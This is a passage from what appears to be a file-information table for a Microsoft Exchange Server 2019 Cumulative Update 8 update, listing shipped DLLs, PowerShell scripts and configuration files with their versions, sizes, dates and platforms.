applicable \n_search.transportoperators.a| 15.2.858.10| 67,976| 04-Apr-2021| 08:39| Not applicable \n_search.transportoperators.b| 15.2.858.10| 67,976| 04-Apr-2021| 08:39| Not applicable \n \n#### \n\n__\n\nMicrosoft Exchange Server 2019 Cumulative Update 8\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.792.13| 71,040| 04-Apr-2021| 10:03| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,522| 04-Apr-2021| 10:03| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,965| 04-Apr-2021| 10:05| Not applicable \nAdemodule.dll| 15.2.792.13| 106,384| 04-Apr-2021| 10:04| x64 \nAirfilter.dll| 15.2.792.13| 42,888| 04-Apr-2021| 10:03| x64 \nAjaxcontroltoolkit.dll| 15.2.792.13| 92,552| 04-Apr-2021| 10:03| x86 \nAntispamcommon.ps1| Not applicable| 13,505| 04-Apr-2021| 10:05| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 04-Apr-2021| 10:03| Not applicable \nAsentirs.msi| Not applicable| 77,824| 04-Apr-2021| 10:03| Not applicable \nAsentsig.msi| Not applicable| 73,728| 04-Apr-2021| 10:03| Not applicable \nBigfunnel.bondtypes.dll| 15.2.792.13| 45,464| 04-Apr-2021| 10:04| x86 \nBigfunnel.common.dll| 15.2.792.13| 66,456| 04-Apr-2021| 10:04| x86 \nBigfunnel.configuration.dll| 15.2.792.13| 118,168| 04-Apr-2021| 10:04| x86 \nBigfunnel.entropy.dll| 15.2.792.13| 44,440| 04-Apr-2021| 10:04| x86 \nBigfunnel.filter.dll| 15.2.792.13| 54,168| 04-Apr-2021| 10:04| x86 \nBigfunnel.indexstream.dll| 15.2.792.13| 68,992| 04-Apr-2021| 10:03| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,160| 04-Apr-2021| 10:03| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.792.13| 19,848| 04-Apr-2021| 10:03| x86 \nBigfunnel.poi.dll| 15.2.792.13| 245,120| 04-Apr-2021| 10:03| x86 \nBigfunnel.postinglist.dll| 15.2.792.13| 189,336| 04-Apr-2021| 10:06| x86 \nBigfunnel.query.dll| 15.2.792.13| 101,256| 04-Apr-2021| 10:06| x86 \nBigfunnel.ranking.dll| 15.2.792.13| 109,448| 04-Apr-2021| 10:05| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.792.13| 3,634,576| 04-Apr-2021| 10:04| x86 \nBigfunnel.tracing.dll| 15.2.792.13| 42,880| 04-Apr-2021| 10:05| x86 \nBigfunnel.wordbreakers.dll| 15.2.792.13| 46,472| 04-Apr-2021| 10:03| x86 \nCafe_airfilter_dll| 15.2.792.13| 42,888| 04-Apr-2021| 10:03| x64 \nCafe_exppw_dll| 15.2.792.13| 83,328| 04-Apr-2021| 10:04| x64 \nCafe_owaauth_dll| 15.2.792.13| 92,032| 04-Apr-2021| 10:04| x64 \nCalcalculation.ps1| Not applicable| 42,113| 04-Apr-2021| 10:06| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,622| 04-Apr-2021| 10:04| Not applicable \nChksgfiles.dll| 15.2.792.13| 57,216| 04-Apr-2021| 10:07| x64 \nCitsconstants.ps1| Not applicable| 15,821| 04-Apr-2021| 10:04| Not applicable \nCitslibrary.ps1| Not applicable| 82,680| 04-Apr-2021| 10:04| Not applicable \nCitstypes.ps1| Not applicable| 14,480| 04-Apr-2021| 10:04| Not applicable \nClassificationengine_mce| 15.2.792.13| 1,693,064| 04-Apr-2021| 10:04| Not applicable \nClusmsg.dll| 15.2.792.13| 134,024| 04-Apr-2021| 10:05| x64 \nCoconet.dll| 15.2.792.13| 48,008| 04-Apr-2021| 10:06| x64 \nCollectovermetrics.ps1| Not applicable| 81,660| 04-Apr-2021| 10:04| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,886| 04-Apr-2021| 10:04| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,971| 04-Apr-2021| 10:03| Not applicable \nComplianceauditservice.exe| 15.2.792.13| 39,800| 04-Apr-2021| 10:07| x86 \nConfigureadam.ps1| Not applicable| 22,804| 04-Apr-2021| 10:06| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,344| 04-Apr-2021| 10:05| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,055| 04-Apr-2021| 10:06| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,806| 04-Apr-2021| 10:05| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,868| 04-Apr-2021| 10:06| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,323| 04-Apr-2021| 10:05| Not applicable \nConnectfunctions.ps1| Not applicable| 37,165| 04-Apr-2021| 10:06| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,440| 04-Apr-2021| 10:07| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,228| 04-Apr-2021| 10:07| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,093| 04-Apr-2021| 10:06| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,572| 04-Apr-2021| 10:05| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,805| 04-Apr-2021| 10:06| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,952| 04-Apr-2021| 10:06| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts_exsmime.dll| 15.2.792.13| 380,800| 04-Apr-2021| 10:07| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.792.13| 1,686,416| 04-Apr-2021| 10:05| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 507| 04-Apr-2021| 07:10| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.792.13| 12,664| 04-Apr-2021| 10:05| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:05| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.792.13| 12,688| 04-Apr-2021| 10:05| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:04| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:04| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:05| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:05| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:04| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:04| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:04| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:06| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.792.13| 12,688| 04-Apr-2021| 10:04| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:04| x86 \nDagcommonlibrary.ps1| Not applicable| 60,242| 04-Apr-2021| 10:04| Not applicable \nDependentassemblygenerator.exe| 15.2.792.13| 22,400| 04-Apr-2021| 10:06| x86 \nDiaghelper.dll| 15.2.792.13| 66,944| 04-Apr-2021| 10:05| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,374| 04-Apr-2021| 10:03| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,402| 04-Apr-2021| 10:06| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,225| 04-Apr-2021| 10:06| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,694| 04-Apr-2021| 10:06| Not applicable \nDisklockerapi.dll| Not applicable| 22,424| 04-Apr-2021| 10:06| x64 \nDlmigrationmodule.psm1| Not applicable| 39,616| 04-Apr-2021| 10:05| Not applicable \nDsaccessperf.dll| 15.2.792.13| 45,952| 04-Apr-2021| 10:03| x64 \nDscperf.dll| 15.2.792.13| 32,640| 04-Apr-2021| 10:03| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.792.13| 1,686,416| 04-Apr-2021| 10:05| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.792.13| 601,496| 04-Apr-2021| 10:03| x86 \nEcpperfcounters.xml| Not applicable| 31,144| 04-Apr-2021| 10:04| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x86 \nEdgetransport.exe| 15.2.792.13| 49,544| 04-Apr-2021| 10:07| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 510| 04-Apr-2021| 07:10| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:07| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:07| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:06| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:05| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:07| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:06| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,672| 04-Apr-2021| 10:06| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:06| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,688| 04-Apr-2021| 10:07| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,696| 04-Apr-2021| 10:07| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.792.13| 12,680| 04-Apr-2021| 10:07| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,404| 04-Apr-2021| 10:06| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,579| 04-Apr-2021| 10:05| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,604| 04-Apr-2021| 10:06| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,638| 04-Apr-2021| 10:06| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,952| 04-Apr-2021| 10:05| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,683| 04-Apr-2021| 10:05| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.792.13| 17,800| 04-Apr-2021| 10:07| x86 \nEscprint.dll| 15.2.792.13| 20,360| 04-Apr-2021| 10:05| x64 \nEse.dll| 15.2.792.13| 3,741,592| 04-Apr-2021| 10:04| x64 \nEseback2.dll| 15.2.792.13| 350,080| 04-Apr-2021| 10:03| x64 \nEsebcli2.dll| 15.2.792.13| 318,360| 04-Apr-2021| 10:04| x64 \nEseperf.dll| 15.2.792.13| 108,936| 04-Apr-2021| 10:06| x64 \nEseutil.exe| 15.2.792.13| 425,352| 04-Apr-2021| 10:03| x64 \nEsevss.dll| 15.2.792.13| 44,416| 04-Apr-2021| 10:05| x64 \nEtweseproviderresources.dll| 15.2.792.13| 101,248| 04-Apr-2021| 10:04| x64 \nEventperf.dll| 15.2.792.13| 59,800| 04-Apr-2021| 10:04| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,136| 04-Apr-2021| 10:07| Not applicable \nExchange.format.ps1xml| Not applicable| 649,725| 04-Apr-2021| 10:07| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,370| 04-Apr-2021| 10:06| Not applicable \nExchange.ps1| Not applicable| 20,831| 04-Apr-2021| 10:06| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,551| 04-Apr-2021| 10:07| Not applicable \nExchange.types.ps1xml| Not applicable| 365,180| 04-Apr-2021| 10:07| Not applicable \nExchangeudfcommon.dll| 15.2.792.13| 122,760| 04-Apr-2021| 10:07| x86 \nExchangeudfs.dll| 15.2.792.13| 272,760| 04-Apr-2021| 10:07| x86 \nExchmem.dll| 15.2.792.13| 86,408| 04-Apr-2021| 10:06| x64 \nExchsetupmsg.dll| 15.2.792.13| 19,352| 04-Apr-2021| 10:05| x64 \nExdbfailureitemapi.dll| Not applicable| 27,032| 04-Apr-2021| 10:05| x64 \nExdbmsg.dll| 15.2.792.13| 230,792| 04-Apr-2021| 10:05| x64 \nExeventperfplugin.dll| 15.2.792.13| 25,472| 04-Apr-2021| 10:07| x64 \nExmime.dll| 15.2.792.13| 364,928| 04-Apr-2021| 10:07| x64 \nExportedgeconfig.ps1| Not applicable| 27,427| 04-Apr-2021| 10:06| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,598| 04-Apr-2021| 10:05| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,246| 04-Apr-2021| 10:05| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,414| 04-Apr-2021| 10:04| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,165| 04-Apr-2021| 10:06| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,084| 04-Apr-2021| 10:06| Not applicable \nExppw.dll| 15.2.792.13| 83,328| 04-Apr-2021| 10:04| x64 \nExprfdll.dll| 15.2.792.13| 26,496| 04-Apr-2021| 10:06| x64 \nExrpc32.dll| 15.2.792.13| 2,029,464| 04-Apr-2021| 10:04| x64 \nExrw.dll| 15.2.792.13| 28,040| 04-Apr-2021| 10:03| x64 \nExsetdata.dll| 15.2.792.13| 2,779,544| 04-Apr-2021| 10:06| x64 \nExsetup.exe| 15.2.792.13| 35,208| 04-Apr-2021| 10:05| x86 \nExsetupui.exe| 15.2.792.13| 471,944| 04-Apr-2021| 10:06| x86 \nExtrace.dll| 15.2.792.13| 245,144| 04-Apr-2021| 10:03| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.792.13| 601,496| 04-Apr-2021| 10:03| x86 \nExwatson.dll| 15.2.792.13| 44,936| 04-Apr-2021| 10:03| x64 \nFastioext.dll| 15.2.792.13| 60,312| 04-Apr-2021| 10:06| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 04-Apr-2021| 10:04| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,228| 04-Apr-2021| 10:04| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,760| 04-Apr-2021| 10:04| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 04-Apr-2021| 10:06| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 04-Apr-2021| 10:06| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,759| 04-Apr-2021| 10:04| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 04-Apr-2021| 10:04| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 04-Apr-2021| 10:04| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 04-Apr-2021| 10:03| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 04-Apr-2021| 10:04| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 04-Apr-2021| 10:04| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,754| 04-Apr-2021| 10:04| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,730| 04-Apr-2021| 10:05| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,760| 04-Apr-2021| 10:04| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 04-Apr-2021| 10:04| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 04-Apr-2021| 10:04| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,757| 04-Apr-2021| 10:04| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 04-Apr-2021| 10:05| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 04-Apr-2021| 10:04| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,875,757| 04-Apr-2021| 10:05| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,777| 04-Apr-2021| 10:04| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 04-Apr-2021| 10:04| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 04-Apr-2021| 10:03| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 04-Apr-2021| 10:04| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 04-Apr-2021| 10:03| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,267| 04-Apr-2021| 10:06| Not applicable \nFilteringpowershell.dll| 15.2.792.13| 223,112| 04-Apr-2021| 10:07| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,652| 04-Apr-2021| 10:07| Not applicable \nFiltermodule.dll| 15.2.792.13| 180,104| 04-Apr-2021| 10:04| x64 \nFipexeuperfctrresource.dll| 15.2.792.13| 15,232| 04-Apr-2021| 10:05| x64 \nFipexeventsresource.dll| 15.2.792.13| 44,936| 04-Apr-2021| 10:07| x64 \nFipexperfctrresource.dll| 15.2.792.13| 32,640| 04-Apr-2021| 10:05| x64 \nFirewallres.dll| 15.2.792.13| 72,600| 04-Apr-2021| 10:07| x64 \nFms.exe| 15.2.792.13| 1,350,024| 04-Apr-2021| 10:07| x64 \nForefrontactivedirectoryconnector.exe| 15.2.792.13| 110,976| 04-Apr-2021| 10:06| x64 \nFpsdiag.exe| 15.2.792.13| 18,840| 04-Apr-2021| 10:04| x86 \nFsccachedfilemanagedlocal.dll| 15.2.792.13| 822,168| 04-Apr-2021| 10:04| x64 \nFscconfigsupport.dll| 15.2.792.13| 56,712| 04-Apr-2021| 10:04| x86 \nFscconfigurationserver.exe| 15.2.792.13| 430,976| 04-Apr-2021| 10:04| x64 \nFscconfigurationserverinterfaces.dll| 15.2.792.13| 15,752| 04-Apr-2021| 10:07| x86 \nFsccrypto.dll| 15.2.792.13| 208,776| 04-Apr-2021| 10:05| x64 \nFscipcinterfaceslocal.dll| 15.2.792.13| 28,552| 04-Apr-2021| 10:04| x86 \nFscipclocal.dll| 15.2.792.13| 38,272| 04-Apr-2021| 10:04| x86 \nFscsqmuploader.exe| 15.2.792.13| 453,528| 04-Apr-2021| 10:04| x64 \nGetucpool.ps1| Not applicable| 19,811| 04-Apr-2021| 10:05| Not applicable \nGetvalidengines.ps1| Not applicable| 13,314| 04-Apr-2021| 10:04| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,809| 04-Apr-2021| 10:06| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,655| 04-Apr-2021| 10:06| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,727| 04-Apr-2021| 10:05| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,775| 04-Apr-2021| 10:06| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,498| 04-Apr-2021| 10:05| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,705| 04-Apr-2021| 10:05| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,810| 04-Apr-2021| 10:06| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,376| 04-Apr-2021| 10:06| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,987| 04-Apr-2021| 10:05| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,066| 04-Apr-2021| 10:06| Not applicable \nGet_storetrace.ps1| Not applicable| 51,871| 04-Apr-2021| 10:04| Not applicable \nHuffman_xpress.dll| 15.2.792.13| 32,664| 04-Apr-2021| 10:05| x64 \nImportedgeconfig.ps1| Not applicable| 77,288| 04-Apr-2021| 10:05| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,516| 04-Apr-2021| 10:05| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,858| 04-Apr-2021| 10:05| Not applicable \nInproxy.dll| 15.2.792.13| 85,904| 04-Apr-2021| 10:08| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,539| 04-Apr-2021| 10:06| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,929| 04-Apr-2021| 10:06| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,963| 04-Apr-2021| 10:06| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.792.13| 107,392| 04-Apr-2021| 10:04| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.792.13| 20,376| 04-Apr-2021| 10:03| Not applicable \nInterop.certenroll.dll| 15.2.792.13| 142,744| 04-Apr-2021| 10:03| x86 \nInterop.licenseinfointerface.dll| 15.2.792.13| 14,208| 04-Apr-2021| 10:04| x86 \nInterop.netfw.dll| 15.2.792.13| 34,200| 04-Apr-2021| 10:03| x86 \nInterop.plalibrary.dll| 15.2.792.13| 72,592| 04-Apr-2021| 10:05| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.792.13| 27,024| 04-Apr-2021| 10:04| Not applicable \nInterop.taskscheduler.dll| 15.2.792.13| 46,480| 04-Apr-2021| 10:04| x86 \nInterop.wuapilib.dll| 15.2.792.13| 60,824| 04-Apr-2021| 10:05| x86 \nInterop.xenroll.dll| 15.2.792.13| 39,832| 04-Apr-2021| 10:05| x86 \nKerbauth.dll| 15.2.792.13| 62,848| 04-Apr-2021| 10:05| x64 \nLicenseinfointerface.dll| 15.2.792.13| 643,456| 04-Apr-2021| 10:04| x64 \nLpversioning.xml| Not applicable| 20,454| 04-Apr-2021| 10:06| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,920| 04-Apr-2021| 10:04| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.792.13| 138,640| 04-Apr-2021| 10:05| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,253| 04-Apr-2021| 10:04| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,356| 04-Apr-2021| 10:04| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,123| 04-Apr-2021| 10:06| Not applicable \nMce.dll| 15.2.792.13| 1,693,064| 04-Apr-2021| 10:04| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,487| 04-Apr-2021| 10:04| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,663| 04-Apr-2021| 10:06| Not applicable \nMicrosoft.database.isam.dll| 15.2.792.13| 127,880| 04-Apr-2021| 10:04| x86 \nMicrosoft.dkm.proxy.dll| 15.2.792.13| 25,984| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.792.13| 68,504| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.792.13| 17,816| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.792.13| 233,368| 04-Apr-2021| 10:06| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.792.13| 15,752| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.792.13| 43,392| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.792.13| 1,776,024| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.792.13| 505,240| 04-Apr-2021| 10:05| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.792.13| 76,184| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.792.13| 135,560| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.792.13| 23,424| 04-Apr-2021| 10:05| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.792.13| 15,744| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.792.13| 27,000| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.792.13| 53,656| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.assistants.dll| 15.2.792.13| 925,048| 04-Apr-2021| 10:03| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.792.13| 26,008| 04-Apr-2021| 10:06| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.792.13| 43,384| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.792.13| 15,240| 04-Apr-2021| 10:05| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.792.13| 14,728| 04-Apr-2021| 10:07| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.792.13| 70,528| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.792.13| 94,600| 04-Apr-2021| 10:07| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.792.13| 13,184| 04-Apr-2021| 10:03| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 